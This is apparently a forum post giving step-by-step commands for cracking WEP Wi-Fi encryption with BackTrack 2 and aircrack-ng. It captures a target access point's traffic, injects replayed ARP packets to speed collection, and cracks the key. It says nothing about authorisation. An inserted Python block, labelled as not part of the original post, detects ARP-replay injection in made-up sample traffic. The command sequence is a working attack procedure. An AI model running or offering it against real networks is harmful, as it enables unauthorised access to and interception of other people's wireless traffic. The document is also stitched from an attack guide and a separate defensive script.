- Boot into BT2.
- Set your wireless card to monitor mode using the iwconfig command.
- Assuming the interface is eth0, use iwconfig eth0 mode monitor.
- If you use Kismet, the monitor mode will be set automatically.
- Kismet must be started in X-Windows if you do not wish to manually edit the conf file.
- From Kismet, remember AP SSID (bssid), AP MAC, Channel and Client MAC.
- Use airodump-ng --channel Channel --bssid AP MAC --write capturefile eth0. This will capture all packets.
- Use airodump-ng --ivs --channel Channel --bssid AP MAC --write capturefile eth0 to capture IVs only.
- The values of RXQ and PWR must be high. This will speed up the packet capture process.
- To increase #DATA value, use aireplay-ng command.
- Use aireplay-ng --arpreplay -b AP MAC -h Client MAC eth0. This will cause the AP to generate ARP packets, which is vital for increasing the #DATA count.
- To crack 64-bit WEP you need at least 300K IVs, and about 1500K if cracking 128-bit WEP encryption.
- Use aircrack-ng -z -b AP MAC capturefile*.cap (upgrade your aircrack to version 0.9.1 or later to perform PTW crack).
- Use aircrack-ng -f 8 -x2 -b AP MAC capturefile*.ivs (to decipher IVs only).
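From the defender's side, the ARP-replay step above leaves a clear signature: the same WEP-protected frame (identical IV and ciphertext) re-injected from one client MAC hundreds of times per second, something no legitimate station does. The following Python is an added example, not part of the original post; the traffic it analyses is constructed sample data with made-up MAC addresses, and the window and threshold values are assumptions to tune per site.

```python
from collections import defaultdict, deque


def detect_arp_replay(frames, window_ms=1000, threshold=50):
    """Return {src_mac: peak_count} for transmitters that repeated the same
    encrypted frame body at least `threshold` times within `window_ms`.

    frames: iterable of (timestamp_ms, src_mac, body) sorted by timestamp,
    where body is the raw WEP payload (IV + ciphertext + ICV) as bytes.
    A station encrypting its own traffic picks a new IV per frame, so the
    body changes every time; an injector replaying one captured ARP frame
    re-sends a byte-identical body, which is what we count here.
    """
    recent = defaultdict(deque)   # (src_mac, body) -> timestamps in window
    peaks = {}
    for ts, src, body in frames:
        q = recent[(src, body)]
        q.append(ts)
        # Drop timestamps that fell out of the sliding window.
        while q and ts - q[0] > window_ms:
            q.popleft()
        if len(q) >= threshold and len(q) > peaks.get(src, 0):
            peaks[src] = len(q)
    return peaks


def sample_frames():
    """Constructed sample traffic (not a real capture): one normal station
    and one station replaying a single captured ARP request."""
    frames = []
    # Normal client: ARP-sized WEP frames, fresh 3-byte IV each time, 10/s.
    for i in range(100):
        iv = bytes([i & 0xFF, (i >> 8) & 0xFF, 0x00, 0x00])  # IV + KeyID byte
        frames.append((i * 100, "aa:bb:cc:00:00:01", iv + b"\x11" * 40))
    # Replaying client: identical IV and ciphertext re-injected at 500/s.
    replayed = bytes.fromhex("6e2a9100") + b"\x5c" * 40
    for i in range(1000):
        frames.append((2000 + i * 2, "aa:bb:cc:00:00:02", replayed))
    frames.sort(key=lambda f: f[0])
    return frames


if __name__ == "__main__":
    for mac, count in detect_arp_replay(sample_frames()).items():
        print(f"possible ARP replay from {mac}: {count} identical frames/s")
```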
Update aircrack-ng
Update aircrack to enable PTW cracking (faster; I cracked a WEP 64 using 8K of packets)
- wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
- tar xvfz aircrack-ng-0.9.1.tar.gz
- cd aircrack-ng-0.9.1
- make
- make install
- Copy all the contents of bt2final.iso to a USB drive (at least 1GB).
- Execute \boot\bootinst.bat
Also, you can start multiple aireplay-ng sessions if more than one Client MAC is found. BT2 provides 6 pseudo-terminals; use them to your advantage.
Cheers!